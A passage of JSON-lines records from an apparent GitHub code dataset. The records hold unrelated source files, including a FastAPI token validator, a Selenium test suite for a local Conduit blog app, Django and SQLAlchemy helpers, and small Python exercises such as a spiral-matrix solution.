if not docstring.startswith(' '):\n # Guess what the right indentation is.\n docstring = ' '*2+docstring\n\n s = dedent(\"\"\"\n {name}\n {hr}\n\n {desc}\n \"\"\").format(name=key, desc=dedent(docstring), hr='-'*len(key))\n print(dedent(s))\n\n\nmain()\n","repo_name":"miracle2k/track0","sub_path":"generate-tests-doc.py","file_name":"generate-tests-doc.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"557904634","text":"import typing as tp\n\nimport os\nfrom fastapi.requests import Request\nfrom jose import jwt\nfrom jose.exceptions import JWTError\n\nfrom utils.exceptions.api_error import ApiError\nfrom logic.auth_logic import AuthService\n\n\nclass RefreshTokenBackend:\n _auth_service: AuthService\n\n def __init__(\n self,\n auth_service: AuthService\n ) -> None:\n self._auth_service = auth_service\n\n async def __call__(self, request: Request) -> Request:\n \"\"\"\n Проверяет валидность токенов.\n Вернет параметр request обратно в контроллер,\n Если токены валидны, иначе вызавет исключение.\n \"\"\"\n refresh_token = request.cookies.get('refresh_token', None)\n if refresh_token is None:\n raise ApiError.forbidden('Токен не был получен!')\n\n access_token = request.headers.get('authorization', None)\n if access_token is None:\n raise ApiError.unauthorized(message='Токен не найден!')\n\n refresh_token_is_valid = await self._check_refresh_token(\n request=request,\n access_token=access_token,\n refresh_token=refresh_token\n )\n\n if not refresh_token_is_valid:\n raise ApiError.forbidden('Токен невалиден!')\n\n return request\n\n async def _check_refresh_token(\n self,\n request: Request,\n refresh_token: str,\n access_token: str\n ) -> bool:\n \"\"\"\n Проверяет валидность refresh токена. 
\n Если токен валидный, установит в параметр request словарь\n С id пользвателя, и значением токена и вернет True.\n \"\"\"\n access_token_slice_start, access_token_slice_end = map(\n int, \n os.getenv('ACCESS_TOKEN_SLICE_FOR_REFRESH_TOKEN').split()\n )\n access_token_part = access_token[access_token_slice_start:access_token_slice_end]\n try:\n payload = jwt.decode(\n refresh_token,\n os.getenv('TOKEN_SECRET_KEY') + access_token_part,\n algorithms=[os.getenv('TOKEN_ALGORITHM')]\n )\n except JWTError:\n return False\n\n user_id = payload.get('user_id', None)\n if user_id is None:\n return False\n\n token_in_db = await self._auth_service.check_token_in_db(\n user_id=user_id, \n token=refresh_token\n )\n\n if not token_in_db:\n return False\n\n request.state.token_data = {\n 'token': refresh_token, \n 'payload': payload.copy()\n }\n\n return True\n","repo_name":"KotovshchikovAndrey/Coursework-microservices","sub_path":"microservices/auth_service/app/api/dependencies/refresh_token_backend.py","file_name":"refresh_token_backend.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12335851806","text":"# selenium\nfrom selenium import webdriver\n# webdriver-manager\nfrom webdriver_manager.chrome import ChromeDriverManager\n# webdriver wait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n# time for time.sleep\nimport time\n# login function\nfrom login_function import login\n# keyboard keys\nfrom selenium.webdriver.common.keys import Keys\n# built-in colors\nfrom selenium.webdriver.support.color import Color\n# data for login and registration\nfrom login_data import registered\n\n#\nclass TestConduit(object):\n def setup(self):\n self.browser = webdriver.Chrome(ChromeDriverManager().install())\n URL = \"http://localhost:1667/\"\n self.browser.get(URL)\n\n def teardown(self):\n self.browser.quit()\n\n # test cookies\n def test_check_cookies(self):\n # find elements\n cookie_panel = self.browser.find_element_by_id('cookie-policy-panel')\n decline_cookie_btn = self.browser.find_element_by_xpath('//button/div[contains(text(), \"I decline!\")]')\n accept_cookie_btn = self.browser.find_element_by_xpath('//button/div[contains(text(), \"I accept!\")]')\n # assert elements displayed\n assert cookie_panel.is_displayed()\n assert decline_cookie_btn.is_displayed()\n assert accept_cookie_btn.is_displayed()\n # test accept button\n accept_cookie_btn.click()\n # wait until cookie panel disappear\n WebDriverWait(self.browser, 2).until_not(EC.presence_of_element_located((By.ID, 'cookie-policy-panel')))\n # try to find cookie panel again\n cookie_panel = self.browser.find_elements_by_id('cookie-policy-panel')\n # assert \"cookie panel list\" len is 0\n assert len(cookie_panel) == 0\n # refresh page\n self.browser.refresh()\n # try to find cookie panel again\n cookie_panel = self.browser.find_elements_by_id('cookie-policy-panel')\n # assert \"cookie panel list\" len is 0 --> it's not appear on the page after refresh\n assert len(cookie_panel) == 0\n\n # end of test cookies\n\n # test registration\n def test_registration(self):\n # navigate to register page\n main_register_btn = self.browser.find_element_by_xpath('//a[@href=\"#/register\"]')\n main_register_btn.click()\n # find elements\n username_input = self.browser.find_element_by_xpath('//input[@placeholder=\"Username\"]')\n email_input = 
self.browser.find_element_by_xpath('//input[@placeholder=\"Email\"]')\n password_input = self.browser.find_element_by_xpath('//input[@type=\"password\"]')\n sign_up_btn = self.browser.find_element_by_xpath('//button[contains(text(), \"Sign up\")]')\n # asserts: the inputs are available\n assert username_input.is_enabled()\n assert email_input.is_enabled()\n assert password_input.is_enabled()\n # fill inputs with data (from login_data)\n username_input.send_keys(registered['username'])\n email_input.send_keys(registered['email'])\n password_input.send_keys(registered['password'])\n # send data\n sign_up_btn.click()\n # wait for error message\n error = WebDriverWait(self.browser, 3).until(\n EC.presence_of_element_located((By.XPATH, '//div[text()=\"Email already taken. \"]')))\n # assert error message displayed\n assert error.is_displayed()\n\n # end of test registration\n\n # test login\n def test_login(self):\n # navigate to login page\n main_login_btn = self.browser.find_element_by_xpath('//a[@href=\"#/login\"]')\n main_login_btn.click()\n # find elements\n email_input = self.browser.find_element_by_xpath('//input[@placeholder=\"Email\"]')\n password_input = self.browser.find_element_by_xpath('//input[@type=\"password\"]')\n sign_in_btn = self.browser.find_element_by_xpath('//button[contains(text(), \"Sign in\")]')\n # assert the inputs are available\n assert email_input.is_enabled()\n assert password_input.is_enabled()\n # fill the inputs with data (from login_data)\n email_input.send_keys(registered['email'])\n password_input.send_keys(registered['password'])\n # send data\n sign_in_btn.click()\n # wait for loading the navbar with name\n time.sleep(1)\n # find navbar\n navbar = self.browser.find_element_by_xpath('//nav')\n # assert profile_name appear on the navbar\n assert registered['username'] in navbar.text\n # assert we got redirected to the main page\n assert self.browser.current_url == 'http://localhost:1667/#/'\n\n # end of test login\n\n # test write new article\n def test_new_article(self):\n # run login function\n login(self)\n # navigate to new article page\n main_new_article_btn = self.browser.find_element_by_xpath('//a[@href=\"#/editor\"]')\n main_new_article_btn.click()\n time.sleep(1)\n # find elements\n title = self.browser.find_element_by_xpath('//input[@placeholder=\"Article Title\"]')\n about = self.browser.find_element_by_xpath('//input[@placeholder=\"What\\'s this article about?\"]')\n body = self.browser.find_element_by_xpath('//textarea[@placeholder=\"Write your article (in markdown)\"]')\n tags = self.browser.find_element_by_xpath('//input[@class=\"ti-new-tag-input ti-valid\"]')\n submit_btn = self.browser.find_element_by_xpath('//button[@type=\"submit\"]')\n # open file\n with open('article_data.txt', 'r', encoding='UTF-8') as article:\n # read line-by-line\n file_content = article.readlines()\n # send keys with specific lines\n title.send_keys(file_content[1].rstrip())\n about.send_keys(file_content[3].rstrip())\n body.send_keys(file_content[5].rstrip())\n tags.send_keys(file_content[7])\n tags.send_keys(file_content[8])\n # submit data\n submit_btn.click()\n time.sleep(1)\n # find elements after write\n article_title = self.browser.find_element_by_css_selector('h1')\n article_author = self.browser.find_element_by_xpath('//a[@class=\"author\"]')\n article_body_text = self.browser.find_element_by_xpath('//div[@class=\"row article-content\"]/div/div[1]/p')\n # asserts: article parts equal to the lines\n assert article_title.text == file_content[1].rstrip()\n 
assert article_author.text == registered['username']\n assert article_body_text.text == file_content[5].rstrip()\n # empty tag list\n tag_list = []\n tags = self.browser.find_elements_by_xpath('//a[@class=\"tag-pill tag-default\"]')\n # collect tags into a list\n for tag in tags:\n tag_list.append(tag.text)\n # assert tags from article_data were successfully appeared on page\n assert file_content[7].rstrip() and file_content[8].rstrip() in tag_list\n\n # end of test write new article\n\n # test edit/modify article\n def test_modify_article(self):\n # run login function\n login(self)\n # navigate to my own profile\n self.browser.get(registered['user_profile_link'])\n time.sleep(1)\n # find the article we want to modify\n # article_title = WebDriverWait(self.browser, 2).until(\n # EC.presence_of_element_located((By.XPATH, 'h1[text()=\"Just another clickbait article\"]')))\n article_title = self.browser.find_element_by_xpath('//h1[text()=\"Just another clickbait article\"]')\n # click on article\n article_title.click()\n time.sleep(1)\n edit_btn = self.browser.find_element_by_xpath('//a[@href=\"#/editor/just-another-clickbait-article\"]')\n edit_btn.click()\n time.sleep(1)\n body_input = self.browser.find_element_by_xpath(\n '//textarea[@placeholder=\"Write your article (in markdown)\"]')\n body_input.clear()\n new_article_body = 'I just modified this article. It\\'s not about clickbait anymore.'\n body_input.send_keys(new_article_body)\n tags_input = self.browser.find_element_by_xpath('//input[@class=\"ti-new-tag-input ti-valid\"]')\n tags_input.send_keys(Keys.BACKSPACE)\n tags_input.send_keys(Keys.BACKSPACE)\n editor_tags = []\n tags_in_editor = self.browser.find_elements_by_xpath('//li[@class=\"ti-tag ti-valid\"]')\n for tag in tags_in_editor:\n editor_tags.append(tag.text)\n submit_btn = self.browser.find_element_by_xpath('//button[@type=\"submit\"]')\n submit_btn.click()\n time.sleep(1)\n tag_list = []\n tags = self.browser.find_elements_by_xpath('//a[@class=\"tag-pill tag-default\"]')\n # collect tags into a list\n for tag in tags:\n tag_list.append(tag.text)\n article_body_text = self.browser.find_element_by_xpath('//div[@class=\"row article-content\"]/div/div[1]/p')\n assert article_body_text.text == new_article_body\n assert editor_tags == tag_list\n\n # end of test edit/modify article\n\n # test delete article\n def test_delete_article(self):\n # run login function\n login(self)\n # navigate to my own profile\n self.browser.get(registered['user_profile_link'])\n # find the article we want to delete\n # article_title = WebDriverWait(self.browser, 3).until(\n # EC.presence_of_element_located((By.XPATH, 'h1[text()=\"Just another clickbait article\"]')))\n article_title = self.browser.find_element_by_xpath('h1[text()=\"Just another clickbait article\"]')\n time.sleep(2)\n # click on article\n article_title.click()\n time.sleep(1)\n # assert delete button displayed\n delete_btn = self.browser.find_element_by_xpath('//button[@class=\"btn btn-outline-danger btn-sm\"]')\n assert delete_btn.is_displayed()\n delete_btn.click()\n # time.sleep(1)\n # delete_msg = self.browser.find_element_by_xpath('//div[text()=\"Deleted the article. 
Going home...\"]')\n # assert delete_msg.is_displayed()\n assert self.browser.current_url == 'http://localhost:1667/#/'\n\n # end of test delete article\n\n # test collect data from a user's profile\n def test_collect_data(self):\n # run login function\n login(self)\n # navigate to the specific user's profile\n user_profile_link = 'http://localhost:1667/#/@thetester/'\n self.browser.get(user_profile_link)\n time.sleep(1)\n # find elements\n profile_pic_link = self.browser.find_element_by_xpath('//img[@class=\"user-img\"]').get_attribute('src')\n user_name = self.browser.find_element_by_xpath('//div[@class=\"profile-page\"]/div[1]/div/div/div/h4')\n user_bio = self.browser.find_element_by_xpath('//div[@class=\"profile-page\"]/div[1]/div/div/div/p')\n user_article_titles = self.browser.find_elements_by_xpath('//h1')\n # open or create a file, collect data and fill the file with them\n with open('collected_data.txt', 'a', encoding='UTF-8') as data_collection:\n # username\n data_collection.write('Current user\\'s name: \\n' + user_name.text + '\\n')\n # picture link\n data_collection.write('Profile picture link: \\n' + profile_pic_link + '\\n')\n # bio\n data_collection.write('About: \\n' + user_bio.text + '\\n')\n # articles\n data_collection.write('Articles ' + user_name.text + ' wrote:\\n')\n # use for loop to get the article titles\n for title in user_article_titles:\n data_collection.write('- ' + title.text + '\\n')\n # open (read only) the created file\n with open('collected_data.txt', 'r', encoding='UTF-8') as data_collection:\n # read line-by-line\n collection_content = data_collection.readlines()\n # assert article parts equal to the lines\n assert user_name.text == collection_content[1].rstrip()\n assert profile_pic_link == collection_content[3].rstrip()\n assert user_bio.text == collection_content[5].rstrip()\n assert '- ' + user_article_titles[0].text == collection_content[7].rstrip()\n\n # end of test collect data from a user's profile\n\n # create a list out of titles from the main page\n def test_new_list(self):\n # run login function\n login(self)\n # empty list for the article titles\n article_title_list = []\n # find elements\n main_article_title = self.browser.find_elements_by_xpath('//h1')\n conduit_main_text = self.browser.find_element_by_xpath('//h1[@class=\"logo-font\"]')\n # get every title with for loop\n for title in main_article_title:\n # exception: conduit logo is not a title\n if title.text != conduit_main_text.text:\n article_title_list.append(title.text)\n print(article_title_list)\n # assert both list contains the same number of elements (-1 because of 'conduit')\n assert len(main_article_title) - 1 == len(article_title_list)\n\n # end of create list\n\n # test paginator (go to next page)\n def test_next_page(self):\n # run login function\n login(self)\n # find elements\n first_page = self.browser.find_element_by_xpath('//li[@data-test=\"page-link-1\"]')\n second_page = self.browser.find_element_by_xpath('//li[@data-test=\"page-link-2\"]')\n second_page_link = self.browser.find_element_by_xpath('//li[@data-test=\"page-link-2\"]/a')\n # second_page_color = second_page_link.get_attribute(\"background-color\") # nem működik\n # print(second_page_color)\n # scroll at the bottom of the page\n page_html = self.browser.find_element_by_xpath('//html')\n page_html.send_keys(Keys.END)\n # assert #1 page is the active page\n assert first_page.get_attribute('class') == 'page-item active'\n time.sleep(1)\n # click on page #2\n second_page_link.click()\n # assert #2 page is 
the active page, and get the right background color\n second_page_get_color = second_page_link.value_of_css_property('background-color')\n second_page_hex_color = Color.from_string(second_page_get_color).hex\n assert second_page.get_attribute('class') == 'page-item active'\n assert second_page_hex_color == '#5cb85c'\n\n # end of test paginator\n\n # test write comment function\n def test_write_comment(self):\n # run login function\n login(self)\n # find the first article from main page\n first_article = self.browser.find_element_by_xpath('//div[@class=\"article-preview\"][1]')\n # click on article\n first_article.click()\n time.sleep(1)\n # assert comment form is displayed\n comment_form = self.browser.find_element_by_xpath('//form[@class=\"card comment-form\"]')\n assert comment_form.is_displayed()\n # assert we can write a comment\n comment_textarea = self.browser.find_element_by_xpath('//textarea[@placeholder=\"Write a comment...\"]')\n assert comment_textarea.is_enabled()\n # writing comment\n comment_textarea.send_keys('This is a simple comment.')\n # post button\n send_btn = self.browser.find_element_by_xpath(\n '//button[@class=\"btn btn-sm btn-primary\"][text()=\"Post Comment\"]')\n # click post button\n send_btn.click()\n time.sleep(1)\n # find the fresh comment\n comment_sent = self.browser.find_element_by_xpath('//p[text()=\"This is a simple comment.\"]')\n # find the author of the fresh comment\n comment_author = self.browser.find_element_by_xpath('//a[@class=\"comment-author\"][2]')\n # assert the fresh comment is appeared\n assert comment_sent.is_displayed()\n # assert we wrote the fresh comment\n assert registered['username'] in comment_author.text\n\n # end of test write comment function\n\n # test logout function\n def test_logout(self):\n # find navbar\n navbar = self.browser.find_element_by_xpath('//nav')\n # assert there is no logout button (text) on navbar\n assert 'Log out' not in navbar.text\n # run login function\n login(self)\n # assert Logout button displayed\n assert 'Log out' in navbar.text\n # find logout button\n log_out_link = self.browser.find_element_by_xpath('//a[contains(text(), \"Log out\")]')\n # click on logout button\n log_out_link.click()\n # assert there is no logout button (text) on navbar after logout\n assert 'Log out' not in navbar.text\n # end of test logout function\n","repo_name":"Dinaa95/conduittest2","sub_path":"test/test_conduit.py","file_name":"test_conduit.py","file_ext":"py","file_size_in_byte":16706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74484985127","text":"from django.shortcuts import render\nfrom play.models import UsersInfo\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n@login_required(login_url='login')\ndef profile(r):\n uinfo = UsersInfo.objects.get(userName=r.user)\n context = {\n 'userName': uinfo.userName,\n 'email': uinfo.email,\n 'level': uinfo.level,\n 'score': uinfo.score\n }\n return render(r, 'profile.html', context)\n","repo_name":"vamsikrishna7-github/gameon","sub_path":"gameon/Profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199495122","text":"from item.util import convert_units\n\n#: Input arguments\nARGS = [\"T003\", \"T009\"]\n\n\ndef compute(activity, stock):\n \"\"\"Quality diagnostic for freight load factor.\n\n Returns the ratio of road freight traffic 
from :mod:`.T003` and the total number\n of freight vehicles from :mod:`.T009`.\n\n Parameters\n ----------\n activity : pandas.DataFrame\n From :mod:`.T003`.\n stock : pandas.DataFrame\n From :mod:`.T009`.\n \"\"\"\n spacetime = [\"REF_AREA\", \"TIME_PERIOD\"]\n\n # Select activity\n activity = activity.query(\"MODE == 'Road' and VEHICLE == '_T'\").set_index(spacetime)\n\n # Select stock\n mask = stock.FUEL.isin([\"_Z\"]) & stock.VEHICLE.isin(\n [\n \"Light goods road vehicles\",\n \"Lorries (vehicle wt over 3500 kg)\",\n \"Road tractors\",\n ]\n )\n stock = stock[mask].groupby(spacetime).sum(numeric_only=True)\n\n return (\n # Compute ratio, drop nulls\n (activity[\"VALUE\"] / stock[\"VALUE\"])\n .dropna()\n # Restore column names, for convert_units()\n .rename(\"VALUE\")\n .reset_index()\n .assign(VARIABLE=\"Load factor\", SERVICE=\"F\", MODE=\"Road\")\n # To preferred units\n .pipe(convert_units, \"Gt km / year / kvehicle\", \"kt km / year / vehicle\")\n )\n","repo_name":"transportenergy/database","sub_path":"item/historical/diagnostic/A003.py","file_name":"A003.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"36520407096","text":"#python object oriented programming.\n\n#1 - Creating and instantiating a Python class\n\n# Allow us to logically group our data and function in a way that's easy to reuse as well as build upon.\n# Method --> A function associated with a class\n\n# Attribute --> A variable associated with a class\n\n# classes are blueprints for creating instances.\n\n# Each unique employee is an instance of the Employee_oop class.\nclass Employee_oop:\n def __init__(self, first, last, pay): #self --> variable name for created instance.\n self.first = first\n self.last = last\n self.pay = pay\n self.email = '{}.{}@company.com'.format(first, last)\n \n def fullname(self, middle=None): #When calling methods use paranthesis at end to print it out.\n if middle == None:\n return('{} {}'.format(self.first, self.last))\n else:\n return('{} {} {}'.format(self.first, middle, self.last))\n\n\n\nemp_1 = Employee_oop('Corey', 'Schafer', 50000)\nemp_2 = Employee_oop('John', 'Doe', 60000)\n\nprint(emp_1.fullname()) \nprint(emp_2.fullname('Jane'))\n\n\n","repo_name":"ameerhkhan/Python-Practice-Exercises","sub_path":"OOP_Concepts/OOP_ex1.py","file_name":"OOP_ex1.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32124099677","text":"from astropy.table import Table, Column, MaskedColumn\nimport numpy as np\n\n# MaskedColumn object\n# a = MaskedColumn([1, 2], name='a', mask=[False, True], dtype='i4')\n# b = Column([3, 4], name='b', dtype='i8')\n# print(Table([a, b]))\n\n# numpy maskedarray; remember, the arrays are COLUMNS of data\na = np.ma.array([1, 2])\nb = [3, 4]\nt = Table([a, b], names=('a', 'b'), masked=True)\nprint(f\"\\nthe numpy maskedarray \\n{t}\\n\")\n\n# t = Table([(1, 2), (3, 4)], names=('a', 'b'), masked=True)\nt['a'].mask = [False, True] # Modify column mask (boolean array)\nt['b'].mask = [True, False] # Modify column mask (boolean array)\nprint(t)\nt['a'].fill_value = 0\nt['b'].fill_value = 0\nprint(f\"\\nthe numpy maskedarray \\n{t.filled()}\\n\")\n\n# directly using np.ma.masked elements; embedded is slower\n# a = [1.0, np.ma.masked]\n# b = [np.ma.masked, 'val']\n# print(Table([a, b], names=('a', 
'b')))\n","repo_name":"AndrewJAHogue/Sofia-Spitzer-telescope-internship","sub_path":"Pixel Intensity Plots/scratchwork/masked_data.py","file_name":"masked_data.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20366580429","text":"\"\"\"\r\nFunciones generadoras y expr. generadoras\r\n\"\"\"\r\n\r\ndef mul3Lista(ini, fin, salto=1):\r\n L = []\r\n \r\n for i in range(ini, fin, salto):\r\n if i % 3 == 0:\r\n print('lista mul3:', i)\r\n L.append(i)\r\n return L\r\n\r\ndef mul3gen(ini, fin, salto=1):\r\n for i in range(ini, fin, salto):\r\n if i % 3 == 0:\r\n print('gen mul3:', i)\r\n yield i\r\n\r\nprint('lista:')\r\nfor i in mul3Lista(1,20):\r\n print(i)\r\n\r\nprint('generador:')\r\nfor i in mul3gen(1,20):\r\n print(i)\r\n\r\n\r\n","repo_name":"aldebarran22/curso_santander_1","sub_path":"codigo_junio/generadores.py","file_name":"generadores.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33518862053","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\nimport json\nfrom sqlalchemy.sql import union\nfrom sqlalchemy.sql.expression import Select\nfrom sqlalchemy.exc import IntegrityError\nfrom smarter_score_batcher.database.tsb_connector import TSBDBConnection\nfrom smarter_score_batcher.constant import Constants\nfrom smarter_score_batcher.error.constants import ErrorsConstants\nfrom smarter_score_batcher.error.error_file_generator import build_error_info_header, \\\n build_err_list_from_object\nimport time\n\n\ndef save_assessment(conn, data):\n '''\n Save an assessment to `Constants.TSB_ASMT` table.\n '''\n parameters = {key: value for key, value in zip(data.header, data.values)}\n ins = conn.get_table(Constants.TSB_ASMT).insert()\n conn.execute(ins, **parameters)\n\n\ndef save_metadata(conn, asmtGuid, stateCode, metadata):\n '''\n Save metadata to `Constants.TSB_METADATA` table.\n '''\n parameters = {\n Constants.ASMT_GUID: asmtGuid,\n Constants.STATE_CODE: stateCode,\n Constants.CONTENT: json.dumps(metadata)\n }\n ins = conn.get_table(Constants.TSB_METADATA).insert()\n conn.execute(ins, **parameters)\n\n\ndef save_error_msg(asmtGuid, stateCode, err_code=None, err_source=None,\n err_code_text=None, err_source_text=None, err_input=None):\n '''\n Save error message to `Constants.TSB_ERROR` table.\n '''\n parameters = {\n Constants.ASMT_GUID: asmtGuid,\n Constants.STATE_CODE: stateCode,\n ErrorsConstants.ERR_CODE: err_code,\n ErrorsConstants.ERR_SOURCE: err_source,\n ErrorsConstants.ERR_CODE_TEXT: err_code_text,\n ErrorsConstants.ERR_SOURCE_TEXT: err_source_text,\n ErrorsConstants.ERR_INPUT: err_input\n }\n with TSBDBConnection() as conn:\n ins = conn.get_table(Constants.TSB_ERROR).insert()\n conn.execute(ins, **parameters)\n\n\ndef get_metadata(conn, asmtGuid):\n '''\n Get 
assessment metadata by assessment guid. The assessment guid is passed in from XML request.\n '''\n tsb_metadata = conn.get_table(Constants.TSB_METADATA)\n query = Select([tsb_metadata]).where(tsb_metadata.c.asmt_guid == asmtGuid).with_for_update()\n return conn.get_result(query)\n\n\ndef get_all_assessment_guids():\n '''\n Get all unique assessment guids from `Constants.TSB_METADATA` and `Constants.TSB_ERROR` tables.\n\n If a TSB request being processed successfully, a metadata record will be saved to `Constants.TSB_METADATA`,\n while an error record will be saved to `Constants.TSB_ERROR` in case of a request failed. This is the\n reason that this function need to look into both tables.\n '''\n with TSBDBConnection() as conn:\n # query guids from metadata table\n tsb_metadata = conn.get_table(Constants.TSB_METADATA)\n query_metadata = Select([tsb_metadata.c.state_code, tsb_metadata.c.asmt_guid])\n # query guids from error message table\n tsb_error = conn.get_table(Constants.TSB_ERROR)\n query_error = Select([tsb_error.c.state_code, tsb_error.c.asmt_guid])\n return conn.execute(union(query_metadata, query_error)).fetchall()\n\n\ndef get_assessments(asmtGuid):\n '''Query an assessment batch by assessment guid. Assessments in the\n batch are organized as a list with each assessment row as an item.\n\n :param: assessment guid\n :return: list of all assessment guids\n :return: list of all assessment data\n :return: list of column names in the same order as assessment data\n '''\n with TSBDBConnection() as conn:\n tsb_asmt = conn.get_table(Constants.TSB_ASMT)\n columns = []\n data = []\n guids = []\n query = Select([tsb_asmt]).where(tsb_asmt.c.AssessmentGuid == asmtGuid)\n assessments = conn.get_streaming_result(query)\n for i, asmt in enumerate(assessments):\n row = []\n for j, (column, value) in enumerate(asmt.items()):\n if i == 0 and j > 0: # first column is guid\n columns.append(column)\n if j == 0:\n guids.append(value)\n else:\n row.append(value)\n data.append(row)\n return guids, data, columns\n\n\ndef get_error_message(asmtGuid):\n '''\n Get all error message within a batch by assessment guid.\n\n :param: assessment guid\n :return: list of error record guids\n :return: list of errors\n '''\n with TSBDBConnection() as conn:\n tsb_error = conn.get_table(Constants.TSB_ERROR)\n error_info = build_error_info_header()\n query = Select([tsb_error]).where(tsb_error.c.asmt_guid == asmtGuid)\n errors = conn.get_streaming_result(query)\n error_guids = []\n for error in errors:\n error_guids.append(error[Constants.TSB_ERROR_GUID])\n err_list = build_err_list_from_object(error)\n error_info[ErrorsConstants.TSB_ERROR].append(err_list)\n return error_guids, error_info\n\n\ndef delete_assessments(assessment_id, tsb_asmt_rec_ids, tsb_error_rec_ids):\n '''\n Delete assessment information in database with a batch.\n\n :param: assessment guid\n :param: list of `Constants.TSB_ASMT` primary keys\n :param: list of `Constants.TSB_ERROR` primary keys\n '''\n retry = 3\n while retry != 0:\n with TSBDBConnection() as conn:\n transaction = conn.get_transaction()\n try:\n # delete error messages\n if tsb_error_rec_ids:\n tsb_error = conn.get_table(Constants.TSB_ERROR)\n conn.execute(tsb_error.delete().where(tsb_error.c.tsb_error_rec_id.in_(tsb_error_rec_ids)))\n\n # delete meta data in database\n if tsb_asmt_rec_ids:\n tsb_asmt = conn.get_table(Constants.TSB_ASMT)\n conn.execute(tsb_asmt.delete().where(tsb_asmt.c.tsb_asmt_rec_id.in_(tsb_asmt_rec_ids)))\n\n # delete assessment data in database\n if assessment_id:\n 
tsb_metadata = conn.get_table(Constants.TSB_METADATA)\n conn.execute(tsb_metadata.delete().where(tsb_metadata.c.asmt_guid == assessment_id))\n transaction.commit()\n break\n except:\n transaction.rollback()\n time.sleep(1)\n retry -= 1\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter_score_batcher/smarter_score_batcher/database/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"16463266693","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestForkStatus(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.forkNumber = 20\n\n def test_post(self):\n self.response = self.w3.klay.fork_status(\n self.forkNumber\n )\n self.assertTrue(self.response >= 0)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/klay/configuration/test_fork_status.py","file_name":"test_fork_status.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"18824260922","text":"from flasgger import Swagger\n\nswagger_config = {\n \"headers\": [\n ],\n \"specs\": [\n {\n \"endpoint\": 'bot',\n \"route\": '/bot.json',\n \"rule_filter\": lambda rule: True, \n \"model_filter\": lambda tag: True, \n }\n ],\n \"static_url_path\": \"/flasgger_static\",\n \"swagger_ui\": True,\n \"specs_route\": \"/apidocs/\"\n }\n\ndef config_swagger(app):\n \n swagger = Swagger(app,\n template={\n \"info\": {\n \"title\": \"backend api\",\n \"version\": \"1.0\",\n },\n\n },config=swagger_config\n )\n\n return swagger","repo_name":"sinaban/bot-backend","sub_path":"swagger_config.py","file_name":"swagger_config.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38132577789","text":"import bisect\nimport math\nfrom typing import List\nfrom collections import deque, defaultdict, OrderedDict, Counter\nfrom util import (\n TreeNode, lc_list2tree,\n ListNode, lc_list2singlelinkedlist\n)\n\n\nclass Solution:\n def spiralMatrixIII(self, rows: int, cols: int, rStart: int, cStart: int) -> List[List[int]]:\n d = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n idx = 0\n flag = True\n cnt = 1\n ans = [[rStart, cStart]]\n last = [rStart, cStart]\n while len(ans) < rows * cols:\n for i in range(cnt):\n new_row = last[0] + d[idx % 4][0]\n new_col = last[1] + d[idx % 4][1]\n if 0 <= new_row < rows and 0 <= new_col < cols:\n ans.append([new_row, new_col])\n last = [new_row, new_col]\n if flag:\n flag = False\n else:\n flag = True\n cnt += 1\n idx += 1\n return ans\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n rows = 5\n cols = 6\n rStart = 1\n cStart = 4\n rows = 1\n cols = 4\n rStart = 0\n cStart = 0\n print(sol.spiralMatrixIII(rows, cols, rStart, cStart))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc500+/lc885/SpiralMatrixIII.py","file_name":"SpiralMatrixIII.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32345946733","text":"import math\n\nn = int(input())\n\nnumber = str(math.factorial(n))\ncount = 0\n\nfor i in range(len(number) - 1, -1, -1):\n if number[i] == \"0\":\n count += 1\n else:\n 
